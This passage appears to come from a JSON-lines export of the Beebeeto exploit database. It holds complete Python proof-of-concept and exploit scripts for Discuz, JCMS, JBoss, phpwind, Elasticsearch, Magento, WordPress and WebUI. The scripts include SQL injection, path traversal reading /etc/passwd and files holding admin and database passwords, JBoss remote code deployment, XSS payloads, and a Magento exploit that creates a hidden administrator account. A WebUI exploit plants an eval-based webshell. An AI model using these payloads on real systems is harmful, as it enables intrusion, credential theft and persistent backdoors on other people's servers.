('/plugin.php?id=nds_up_ques:nds_ques_viewanswer&srchtxt=1&orderby=dateline'\r\n                   ' and 1=(updatexml(1,concat(0x27,md5(123)),1))--')\r\n        verify_url = args['options']['target'] + payload\r\n        if args['options']['verbose']:\r\n            print '[*] Request URL: ' + verify_url\r\n        req = requests.get(verify_url)\r\n        if '202cb962ac59075b964b07152d234b70' in req.content:\r\n            args['success'] = True\r\n            args['poc_ret']['vul_url'] = verify_url\r\n        return args\r\n\r\n\r\n    exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())", "desc": "Discuz plugin sql injection vulnerability.", "app_name": "Discuz", "id": "poc-2015-0107", "layer4_protocol": null}
+{"create_date": "2015-06-01 17:07:28", "name": "JCMS /opr_readfile.jsp \u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e POC", "level": "\u9ad8\u5371", "batchable": 1, "author": "\u5c0f\u9a6c\u7532", "rank": 3, "port": null, "vul_type": "\u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d", "tag": "JCMS\u6f0f\u6d1e,/opr_readfile.jsp\u6f0f\u6d1e,jsp", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport requests\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2015-0106',\r\n            'name': 'JCMS /opr_readfile.jsp \u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e POC',\r\n            'author': '\u5c0f\u9a6c\u7532',\r\n            'create_date': '2015-06-01',\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',\r\n            'port': [80],\r\n            'layer4_protocol': ['tcp'],\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': 'JCMS',\r\n            'vul_version': ['*'],\r\n            'type': 'Arbitrary File Download',\r\n            'tag': ['JCMS\u6f0f\u6d1e', '/opr_readfile.jsp\u6f0f\u6d1e', 'jsp'],\r\n            'desc': '''\r\n                    \u5927\u6c49\u7248\u901ajcms\u7cfb\u7edf\u4efb\u610f\u6587\u4ef6\u8bfb\u53d6\uff0c\u53ef\u4ee5\u76f4\u63a5\u83b7\u53d6\u7ba1\u7406\u5458\u8d26\u53f7\uff0c\u5bc6\u7801\u660e\u6587\u3001\u6570\u636e\u5e93\u5bc6\u7801\u660e\u6587\u3001\r\n                    \u914d\u7f6e\u4fe1\u606f\u7b49\u975e\u5e38\u654f\u611f\u7684\u4fe1\u606f\uff0c\u53ef\u4ee5\u8f7b\u677e\u5b9e\u73b0\u65e0\u4efb\u4f55\u9650\u5236\u83b7\u53d6 WEBSHELL ...\r\n                    ''',\r\n            'references': ['http://www.ijindun.com/News/gonggao/2014/1125/178542.html'],\r\n        },\r\n    }\r\n\r\n\r\n    @classmethod\r\n    def verify(cls, args):\r\n        url = args['options']['target']\r\n        verify_url = ('%s/jcms/jcms_files/jcms1/web1/site/module/comment/opr_readfile.jsp?filename='\r\n                      '../../../../../../WEB-INF/ini/merpserver.ini') % url\r\n        if args['options']['verbose']:\r\n            print '[*] Request URL: ' + verify_url\r\n        req = requests.get(verify_url)\r\n        if req.status_code == 200 and 'AdminPW' in req.content:\r\n            args['success'] = True\r\n            args['poc_ret']['vul_url'] = verify_url\r\n        return args\r\n\r\n    exploit = verify\r\n\r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())", "desc": "\u5927\u6c49\u7248\u901ajcms\u7cfb\u7edf\u4efb\u610f\u6587\u4ef6\u8bfb\u53d6\uff0c\u53ef\u4ee5\u76f4\u63a5\u83b7\u53d6\u7ba1\u7406\u5458\u8d26\u53f7\uff0c\u5bc6\u7801\u660e\u6587\u3001\u6570\u636e\u5e93\u5bc6\u7801\u660e\u6587\u3001\r\n\u914d\u7f6e\u4fe1\u606f\u7b49\u975e\u5e38\u654f\u611f\u7684\u4fe1\u606f\uff0c\u53ef\u4ee5\u8f7b\u677e\u5b9e\u73b0\u65e0\u4efb\u4f55\u9650\u5236\u83b7\u53d6 WEBSHELL ...", "app_name": "JCMS", "id": "poc-2015-0106", "layer4_protocol": null}
+{"create_date": "2015-06-01 16:27:40", "name": "JBoss 5.1.0 DeploymentFileRepository \u4ee3\u7801\u6267\u884c\u6f0f\u6d1e POC", "level": "\u9ad8\u5371", "batchable": 1, "author": "linglin", "rank": 4, "port": null, "vul_type": "\u547d\u4ee4\u6267\u884c", "tag": "JBoss\u6f0f\u6d1e,DeploymentFileRepository,Remot Code Execution", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2015-0105',\r\n            'name': 'JBoss 5.1.0 DeploymentFileRepository \u4ee3\u7801\u6267\u884c\u6f0f\u6d1e POC',\r\n            'author': 'Linglin',\r\n            'create_date': '2015-05-28',\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',\r\n            'port': [80],\r\n            'layer4_protocol': ['tcp'],\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': 'JBoss',\r\n            'vul_version': ['5.1.0'],\r\n            'type': 'Code Execution',\r\n            'tag': ['JBoss\u6f0f\u6d1e', 'DeploymentFileRepository', 'Remot Code Execution'],\r\n            'desc': 'Jboss5.1.0\u9ed8\u8ba4\u914d\u7f6e\u5141\u8bb8\u76f4\u63a5\u90e8\u7f72\u4ee3\u7801\u5230\u670d\u52a1\u5668\u4e0a\uff0c\u53ef\u4ee5\u6267\u884c\u653b\u51fb\u8005\u63d0\u4f9b\u7684\u4efb\u610f\u4ee3\u7801\u3002',\r\n            'references': ['http://www.securityfocus.com/bid/21219/',\r\n            ],\r\n        },\r\n    }\r\n\r\n    @classmethod\r\n    def verify(cls, args):\r\n        verify_code = ('\\n<%@ page import=\"java.util.*,java.io.*\" %>\\n<%@ page import=\"'\r\n                       'java.io.*\"%>\\n<%\\nString path=request.getRealPath(\"\");\\nout.prin'\r\n                       'tln(path);\\nFile d=new File(path);\\nif(d.exists()){\\n  d.delete()'\r\n                       ';\\n  }\\n%>\\n<% out.println(\"this_is_not_exist_9.1314923\");%>')\r\n        payload = ('action=invokeOp&name=jboss.admin%%3Aservice%%3DDeploymentFileRepositor'\r\n                   'y&methodIndex=5&arg0=test.war&arg1=test&arg2=.jsp&arg3=%s&arg4=True')\r\n        verify_data = payload % urllib2.quote(verify_code)\r\n        verify_url = args['options']['target'] + '/jmx-console/HtmlAdaptor'\r\n        if args['options']['verbose']:\r\n            print '[*] Request URL: ' + verify_url\r\n        page_content = ''\r\n        request = urllib2.Request(verify_url, verify_data)\r\n        response = urllib2.urlopen(request)\r\n        page_content = response.read()\r\n        if 'this_is_not_exist_9.1314923' in page_content:\r\n            args['success'] = True\r\n            args['poc_ret']['vul_url'] = verify_url\r\n        return args\r\n\r\n    exploit = verify\r\n\r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())", "desc": "Jboss5.1.0\u9ed8\u8ba4\u914d\u7f6e\u5141\u8bb8\u76f4\u63a5\u90e8\u7f72\u4ee3\u7801\u5230\u670d\u52a1\u5668\u4e0a\uff0c\u53ef\u4ee5\u6267\u884c\u653b\u51fb\u8005\u63d0\u4f9b\u7684\u4efb\u610f\u4ee3\u7801\u3002", "app_name": "Jboss", "id": "poc-2015-0105", "layer4_protocol": null}
+{"create_date": "2015-05-25 10:53:09", "name": "phpwind v8.7 /goto.php \u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "tmp", "rank": 3, "port": null, "vul_type": "\u8de8\u7ad9\u6f0f\u6d1e", "tag": "phpwind\u7cfb\u7edf\u6f0f\u6d1e,/goto.php\u6f0f\u6d1e,phpwind xss\u6f0f\u6d1e,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport requests\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2015-0104',\r\n            'name': 'phpwind v8.7 /goto.php \u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e POC',\r\n            'author': 'tmp',\r\n            'create_date': '2015-05-25',\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',\r\n            'port': [80],\r\n            'layer4_protocol': ['tcp'],\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': 'phpwind',\r\n            'vul_version': ['8.7'],\r\n            'type': 'Cross Site Scripting',\r\n            'tag': ['phpwind\u7cfb\u7edf\u6f0f\u6d1e', '/goto.php\u6f0f\u6d1e', 'phpwind xss\u6f0f\u6d1e', 'php'],\r\n            'desc': 'The first programming code flaw occurs at \"&url\" parameter in \"/goto.php?\" page.',\r\n            'references': ['http://seclists.org/fulldisclosure/2015/May/106',],\r\n        },\r\n    }\r\n\r\n\r\n    @classmethod\r\n    def verify(cls, args):\r\n        verify_url = '%s/goto.php?url=beebee\"><to>alert(1)</script>.com/' % args['options']['target']\r\n        if args['options']['verbose']:\r\n            print '[*] Request URL: ' + verify_url\r\n        req = requests.get(verify_url)\r\n        if req.status_code == 200 and 'url=beebee\"><to>alert(1)</script>.com' in req.content:\r\n            args['success'] = True\r\n            args['poc_ret']['vul_url'] = verify_url\r\n        return args\r\n\r\n    exploit = verify\r\n\r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())", "desc": "The first programming code flaw occurs at \"&url\" parameter in \"/goto.php?\" page.", "app_name": "PHPWind", "id": "poc-2015-0104", "layer4_protocol": null}
+{"create_date": "2015-05-21 20:32:47", "name": "Elasticsearch < 1.4.5 / < 1.5.2 \u4efb\u610f\u6587\u4ef6\u8bfb\u53d6\u6f0f\u6d1e Exploit", "level": "\u9ad8\u5371", "batchable": 1, "author": "1024", "rank": 3, "port": null, "vul_type": "\u4efb\u610f\u6587\u4ef6\u8bfb\u53d6", "tag": "Elasticsearch\u6f0f\u6d1e,ES \u4efb\u610f\u6587\u4ef6\u8bfb\u53d6\u6f0f\u6d1e,CVE-2015-3337", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport requests\r\nimport urlparse\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2015-0103',\r\n            'name': 'Elasticsearch < 1.4.5 / < 1.5.2 \u4efb\u610f\u6587\u4ef6\u8bfb\u53d6\u6f0f\u6d1e Exploit',\r\n            'author': '1024',\r\n            'create_date': '2015-05-21',\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',\r\n            'port': [9200],\r\n            'layer4_protocol': ['tcp'],\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': 'Elasticsearch',\r\n            'vul_version': ['1.5.2'],\r\n            'type': 'Arbitrary File Read',\r\n            'tag': ['Elasticsearch\u6f0f\u6d1e', 'ES \u4efb\u610f\u6587\u4ef6\u8bfb\u53d6\u6f0f\u6d1e', 'CVE-2015-3337'],\r\n            'desc': '''\r\n                    Directory traversal vulnerability in Elasticsearch before 1.4.5 and 1.5.x before 1.5.2,\r\n                    when a site plugin is enabled, allows remote attackers to read arbitrary files via unspecified vectors.\r\n                    ''',\r\n            'references': [\r\n                    'https://www.exploit-db.com/exploits/37054/',\r\n                    'https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-3337',\r\n            ],\r\n        },\r\n    }\r\n\r\n    @classmethod\r\n    def exploit(cls, args):\r\n        # Include more plugin names to check if they are installed\r\n        pluginList = ['test','kopf', 'HQ', 'marvel', 'bigdesk', 'head']\r\n        target = urlparse.urlparse(args['options']['target'])\r\n        for plugin in pluginList:\r\n            es_test = '%s://%s:9200/_plugin/%s/../../../bin/elasticsearch' % \\\r\n                      (target.scheme, target.netloc, plugin)\r\n            verify_url = '%s://%s:9200/_plugin/%s/../../../../../../etc/passwd' % \\\r\n                         (target.scheme, target.netloc, plugin)\r\n            response = requests.get(es_test, timeout=8, allow_redirects=False)\r\n            if \"ES_JAVA_OPTS\" in response.content:\r\n                if args['options']['verbose']:\r\n                    print '[*] Request URL: ' + es_test\r\n                req = requests.get(verify_url, timeout=8)\r\n                if req.status_code == 200:\r\n                    args['success'] = True\r\n                    args['poc_ret']['vul_url'] = verify_url\r\n                    return args\r\n            continue\r\n        return args\r\n\r\n    verify = exploit\r\n\r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())", "desc": "Directory traversal vulnerability in Elasticsearch before 1.4.5 and 1.5.x before 1.5.2,\r\nwhen a site plugin is enabled, allows remote attackers to read arbitrary files via unspecified vectors.", "app_name": "ElasticSearch", "id": "poc-2015-0103", "layer4_protocol": null}
+{"create_date": "2015-05-14 11:49:17", "name": "Elasticsearch _river \u672a\u6388\u6743\u8bbf\u95ee\u6f0f\u6d1e POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "foundu", "rank": 3, "port": null, "vul_type": "\u8d8a\u6743\u8bbf\u95ee", "tag": "Elasticsearch\u6f0f\u6d1e,\u672a\u6388\u6743\u8bbf\u95ee\u6f0f\u6d1e,\u4fe1\u606f\u6cc4\u9732\u6f0f\u6d1e", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport requests\r\nimport urlparse\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2015-0100',\r\n            'name': 'Elasticsearch _river \u672a\u6388\u6743\u8bbf\u95ee\u6f0f\u6d1e POC',\r\n            'author': 'foundu',\r\n            'create_date': '2015-05-14',\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',\r\n            'port': [9200],\r\n            'layer4_protocol': ['tcp'],\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': 'Elasticsearch',\r\n            'vul_version': ['*'],\r\n            'type': 'Privilege Escalation',\r\n            'tag': ['Elasticsearch\u6f0f\u6d1e', '\u672a\u6388\u6743\u8bbf\u95ee\u6f0f\u6d1e', '\u4fe1\u606f\u6cc4\u9732\u6f0f\u6d1e'],\r\n            'desc': 'elasticsearch\u5728\u5b89\u88c5\u4e86river\u4e4b\u540e\u53ef\u4ee5\u540c\u6b65\u591a\u79cd\u6570\u636e\u5e93\u6570\u636e\uff08\u5305\u62ec\u5173\u7cfb\u578b\u7684mysql\u3001mongodb\u7b49\uff09',\r\n            'references': ['http://zone.wooyun.org/content/20297',\r\n            ],\r\n        },\r\n    }\r\n\r\n\r\n    @classmethod\r\n    def verify(cls, args):\r\n        target = urlparse.urlparse(args['options']['target'])\r\n        verify_url = '%s://%s:9200/_river/_search' % (target.scheme, target.netloc)\r\n        if args['options']['verbose']:\r\n            print '[*] Request URL: ' + verify_url\r\n        req = requests.get(verify_url)\r\n        if req.status_code == 200 and '_river' in req.content and 'type' in req.content:\r\n            args['success'] = True\r\n            args['poc_ret']['vul_url'] = verify_url\r\n        return args\r\n\r\n    exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())", "desc": "elasticsearch\u5728\u5b89\u88c5\u4e86river\u4e4b\u540e\u53ef\u4ee5\u540c\u6b65\u591a\u79cd\u6570\u636e\u5e93\u6570\u636e\uff08\u5305\u62ec\u5173\u7cfb\u578b\u7684mysql\u3001mongodb\u7b49\uff09", "app_name": "ElasticSearch", "id": "poc-2015-0100", "layer4_protocol": null}
+{"create_date": "2015-05-12 17:20:13", "name": "Magento 1.9.1 \u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e Exploit", "level": "\u9ad8\u5371", "batchable": 0, "author": "foundu", "rank": 4, "port": null, "vul_type": "\u4ee3\u7801\u6267\u884c", "tag": "Magento 1.9.1 \u6f0f\u6d1e,Magento RCE \u6f0f\u6d1e,\u7535\u5b50\u5546\u52a1\u7cfb\u7edf\u6f0f\u6d1e,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport base64\r\nimport requests\r\n\r\nfrom baseframe import BaseFrame\r\nfrom utils.generator import generate_user_pwd\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2015-0099',\r\n            'name': 'Magento 1.9.1 \u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e Exploit',\r\n            'author': 'foundu',\r\n            'create_date': '2015-05-12',\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',\r\n            'port': [80],\r\n            'layer4_protocol': ['tcp'],\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': 'Magento',\r\n            'vul_version': ['1.9.1'],\r\n            'type': 'Code Execution',\r\n            'tag': ['Magento 1.9.1 \u6f0f\u6d1e', 'Magento RCE \u6f0f\u6d1e', '\u7535\u5b50\u5546\u52a1\u7cfb\u7edf\u6f0f\u6d1e', 'php'],\r\n            'desc': '''\r\n                    Magento\u5e73\u53f0\u4e2d\u7684\u4e00\u7cfb\u5217\u4e25\u91cd\u6f0f\u6d1e\u6700\u7ec8\u5141\u8bb8\u672a\u7ecf\u6388\u6743\u7684\u653b\u51fb\u8005\u6267\u884c\u4ed6\u4eec\u6240\u9009\u62e9\u7684\r\n                    web\u670d\u52a1\u5668\u4e0a\u7684\u4efb\u610f\u4ee3\u7801\u3002\r\n                    ''',\r\n            'references': [\r\n                'http://devdocs.magento.com/guides/m1x/other/appsec-900_addhandler.html',\r\n                'http://www.siph0n.in/exploits.php?id=3829',\r\n                ],\r\n        },\r\n    }\r\n\r\n\r\n    @classmethod\r\n    def exploit(cls, args):\r\n        url = args['options']['target']\r\n        if url.endswith(\"/\"):\r\n           url = url[:-1]\r\n        target_url = url + \"/index.php/admin/Cms_Wysiwyg/directive/index/\"\r\n        if args['options']['verbose']:\r\n            print '[*] Request URL: ' + target_url\r\n        # For demo purposes, I use the same attack as is being used in the wild\r\n        SQLQUERY=\"\"\"\r\n        SET @SALT = 'rp';\r\n        SET @PASS = CONCAT(MD5(CONCAT( @SALT , '{password}') ), CONCAT(':', @SALT ));\r\n        SELECT @EXTRA := MAX(extra) FROM admin_user WHERE extra IS NOT NULL;\r\n        INSERT INTO `admin_user` (`firstname`, `lastname`,`email`,`username`,`password`,`created`,`lognum`,`reload_acl_flag`,`is_active`,`extra`,`rp_token`,`rp_token_created_at`) VALUES ('Firstname','Lastname','email@example.com','{username}',@PASS,NOW(),0,0,1,@EXTRA,NULL, NOW());\r\n        INSERT INTO `admin_role` (parent_id,tree_level,sort_order,role_type,user_id,role_name) VALUES (1,2,0,'U',(SELECT user_id FROM admin_user WHERE username = '{username}'),'Firstname');\r\n        \"\"\"\r\n        # Put the nice readable queries into one line,\r\n        # and insert the username:password combinination\r\n        password = generate_user_pwd.password()\r\n        query = SQLQUERY.replace(\"\\n\", \"\").format(username=\"beebeeto\", password=password)\r\n        pfilter = \"popularity[from]=0&popularity[to]=3&popularity[field_expr]=0);{0}\".format(query)\r\n        r = requests.post(target_url, data={\"___directive\":\r\n                         \"e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ\",\r\n                         \"filter\": base64.b64encode(pfilter),\r\n                         \"forwarded\": 1})\r\n        if r.ok:\r\n            args['success'] = True\r\n            args['poc_ret']['vul_url'] = target_url\r\n            args['poc_ret']['message'] = 'Admin(user/pwd): beebeeto/{})'.format(password)\r\n        return args\r\n\r\n    verify = exploit\r\n\r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())", "desc": "Magento\u5e73\u53f0\u4e2d\u7684\u4e00\u7cfb\u5217\u4e25\u91cd\u6f0f\u6d1e\u6700\u7ec8\u5141\u8bb8\u672a\u7ecf\u6388\u6743\u7684\u653b\u51fb\u8005\u6267\u884c\u4ed6\u4eec\u6240\u9009\u62e9\u7684web\u670d\u52a1\u5668\u4e0a\u7684\u4efb\u610f\u4ee3\u7801\u3002", "app_name": "Magento", "id": "poc-2015-0099", "layer4_protocol": null}
+{"create_date": "2015-05-07 10:18:51", "name": "WordPress MiwoFTP <=1.0.5 \u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "range", "rank": 3, "port": null, "vul_type": "\u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d", "tag": "Wordpress MiwoFTP\u63d2\u4ef6\u6f0f\u6d1e,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport urllib\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {  \r\n          # poc\u76f8\u5173\u4fe1\u606f  \r\n          'poc': {  \r\n              'id': 'poc-2015-0096',\r\n              'name': 'WordPress MiwoFTP <=1.0.5 \u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e POC',\r\n              'author': 'range',\r\n              'create_date': '2015-05-05',\r\n          },  \r\n          # \u534f\u8bae\u76f8\u5173\u4fe1\u606f  \r\n          'protocol': {  \r\n              'name': 'http',\r\n              'port': [80],\r\n              'layer4_protocol': ['tcp'],\r\n          },  \r\n          # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f  \r\n          'vul': {  \r\n              'app_name': 'Wordpress',\r\n              'vul_version': ['<=1.0.5',], \r\n              'type': 'Arbitrary File Download',\r\n              'tag': ['Wordpress MiwoFTP\u63d2\u4ef6\u6f0f\u6d1e', 'php'],\r\n              'desc': '''\r\n                      WordPress MiwoFTP Plugin <= 1.0.5 - Arbitrary File Download\r\n                      ''',\r\n              'references': ['https://www.exploit-db.com/exploits/36801/', \r\n              ],  \r\n          },  \r\n    }\r\n\r\n    @classmethod\r\n    def verify(cls, args):\r\n        payload = ('/wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=download'\r\n                   '&item=wp-config.php&order=name&srt=yes')\r\n        verify_url = args['options']['target'] + payload\r\n        request = urllib2.Request(verify_url)\r\n        if args['options']['verbose']:\r\n            print '[*] Request URL: ' + verify_url\r\n        response = urllib2.urlopen(request)\r\n        reg = re.compile(\"DB_PASSWORD\")\r\n        if reg.findall(response.read()):\r\n            args['success'] = True\r\n            args['poc_ret']['vul_url'] = verify_url\r\n        return args\r\n\r\n    exploit = verify\r\n    \r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n    \r\n    mp = MyPoc()\r\n    pprint(mp.run())", "desc": "WordPress MiwoFTP Plugin <= 1.0.5 - Arbitrary File Download", "app_name": "WordPress", "id": "poc-2015-0096", "layer4_protocol": null}
+{"create_date": "2015-04-28 16:09:14", "name": "WebUI 1.5b6 /mainfile.php \u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e POC & Exploit", "level": "\u9ad8\u5371", "batchable": 1, "author": "7rac3", "rank": 4, "port": null, "vul_type": "\u4ee3\u7801\u6267\u884c", "tag": "WebUI\u6f0f\u6d1e,/mainfile.php,Remote Code Execution Vulnerability,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport requests\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        'poc':{\r\n            'id': 'poc-2015-0094',\r\n            'name': 'WebUI 1.5b6 /mainfile.php \u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e POC & Exploit',\r\n            'author': '7rac3',\r\n            'create_date': '2015-4-27',\r\n        },\r\n        'protocol': {\r\n            'name': 'http',\r\n            'port': [80],\r\n            'layer4_protocol': ['tcp'],\r\n        },\r\n        'vul':{\r\n            'app_name': 'WebUI',\r\n            'vul_version': ['1.5b6'],\r\n            'type': 'Code Execution',\r\n            'tag': ['WebUI\u6f0f\u6d1e', '/mainfile.php', 'Remote Code Execution Vulnerability', 'php'],\r\n            'desc': 'WebUI 1.5b6 has code execution in mainfile.php',\r\n            'references': ['https://www.exploit-db.com/exploits/36821/',\r\n            ],\r\n        },\r\n    }\r\n\r\n    @classmethod\r\n    def verify(cls,args):\r\n        target = args['options']['target']\r\n        payload = '/mainfile.php?username=RCE&password=BB2&_login=1&Logon=%27;echo%20md5(111);%27'\r\n        vul_url = target + payload\r\n        if args['options']['verbose']:\r\n            print '[*] Request URL: '+ vul_url\r\n        response = requests.get(vul_url)\r\n        text = response.content\r\n        if '698d51a19d8a121ce581499d7b701668' in text:\r\n            args['success'] = True\r\n            args['poc_ret']['vul_url'] = vul_url\r\n        return args\r\n\r\n\r\n    @classmethod\r\n    def exploit(cls,args):\r\n        target = args['options']['target']\r\n        payload = '/mainfile.php?username=RCE&password=BB2&_login=1&Logon=%27;echo%20md5(111);@eval($_POST[bb2]);%27'\r\n        vul_url = target + payload\r\n        if args['options']['verbose']:\r\n            print '[*] Request URL: '+ vul_url\r\n        response = requests.get(vul_url)\r\n        text = response.content\r\n        if '698d51a19d8a121ce581499d7b701668' in text:\r\n            args['success'] = True\r\n            args['poc_ret']['webshell'] = vul_url\r\n            args['poc_ret']['password'] = 'bb2'\r\n        return args\r\n\r\n\r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = Mypoc()\r\n    pprint(mp.run())", "desc": "WebUI 1.5b6 has code execution in mainfile.php", "app_name": "Other", "id": "poc-2015-0094", "layer4_protocol": null}
+{"create_date": "2015-04-27 21:32:04", "name": "Wordpress < 4.1.2 /wp-comments-post.php \u5b58\u50a8\u578bXSS\u6f0f\u6d1e POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "tmp", "rank": 5, "port": null, "vul_type": "\u8de8\u7ad9\u6f0f\u6d1e", "tag": "Wordpress\u5b58\u50a8\u578bXSS\u6f0f\u6d1e,/wp-comments-post.php,Cross Site Scripting,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport random\r\nimport string\r\nimport requests\r\n\r\nfrom baseframe import BaseFrame\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2015-0092',\r\n            'name': 'Wordpress < 4.1.2 /wp-comments-post.php \u5b58\u50a8\u578bXSS\u6f0f\u6d1e POC',\r\n            'author': 'tmp',\r\n            'create_date': '2015-04-26',\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',\r\n            'port': [80],\r\n            'layer4_protocol': ['tcp'],\r\n        },\r\n        # 